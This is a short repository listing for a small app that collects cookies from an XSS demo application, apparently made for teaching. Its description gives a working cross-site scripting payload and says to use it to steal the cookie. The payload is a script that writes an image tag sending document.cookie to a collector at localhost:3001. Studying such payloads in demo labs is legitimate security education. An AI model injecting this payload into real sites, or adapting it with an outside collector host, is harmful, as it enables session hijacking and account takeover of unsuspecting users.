There are no reviews yet. Be the first to send feedback to the community and the maintainers!
Repository Details
Simple app to get the cookies content from the XSS demo app (made by kacper sokolowski). Use this code to steal the cookie : <script type="text/javascript"> document.write('<img src="http://localhost:3001/v1/cookie?cookie=' + document.cookie + '" />') </script>